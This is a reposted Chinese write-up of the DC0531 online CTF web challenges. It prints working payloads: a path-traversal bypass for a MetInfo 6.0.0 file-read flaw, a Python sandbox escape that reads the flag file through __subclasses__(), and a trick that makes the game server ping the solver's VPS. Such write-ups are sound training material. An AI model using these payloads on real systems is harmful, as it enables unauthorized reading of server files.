DC0531 CTF 线上赛

栏目: 服务器 · 发布时间: 7年前

内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可

Web1

先关注公众号然后发现是个游戏。 测试发现 s:ip 这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露

DC0531 CTF 线上赛

通过分析可知,将武器切换为flag即可 DC0531 CTF 线上赛

然后一直s我们的vps

DC0531 CTF 线上赛 DC0531 CTF 线上赛

得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg 解密即可

Web2

题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/ 根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag DC0531 CTF 线上赛

Web3

首先输入 ().__class__.__base__.__subclasses__() 不可用

0x1.__class__.__base__.__subclasses__() 发现可用 DC0531 CTF 线上赛

0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag") 可以读到文件流

但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格

[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]

DC0531 CTF 线上赛

Web4

原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7


以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

中国游戏风云

中国游戏风云

王亚晖 / 中国发展出版社 / 2018-11-1 / 168.00元

本书以时间为序,介绍了整个游戏产业发展的跌宕起伏。分别讲述了早期游戏市场、单机游戏、网络游戏、网页游戏和手机游戏以及未来游戏世界。作者本人曾为知名游戏产业人,书中披露了大量不为大众所知的行业故事和行业数据。为游戏的制作者、投资人、玩家,抑或想了解游戏的人,提供了一个理性的梳理。一起来看看 《中国游戏风云》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

随机密码生成器
随机密码生成器

多种字符组合密码

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码